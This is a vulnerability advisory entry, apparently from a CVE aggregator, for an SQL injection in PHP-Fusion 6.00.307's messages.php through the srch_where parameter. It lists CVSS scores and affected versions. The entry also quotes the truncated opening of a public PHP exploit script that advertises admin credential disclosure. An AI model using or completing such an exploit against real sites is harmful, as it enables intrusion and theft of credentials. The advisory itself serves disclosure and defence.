6.4
CVSSv2

CVE-2006-2459

Published: 19/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

SQL injection vulnerability in messages.php in PHP-Fusion 6.00.307 and previous versions allows remote authenticated users to execute arbitrary SQL commands via the srch_where parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

php fusion php fusion 6.00.307

php fusion php fusion 6.00.306

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "PHP-Fusion <= v600306 \"srch_where\" SQL Injection/Admin credentials disclosure\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; if ($argc<5) { echo "Usage: php "$argv[0]" host path user pass OPTIONS\r\n"; echo "host: target server (i ...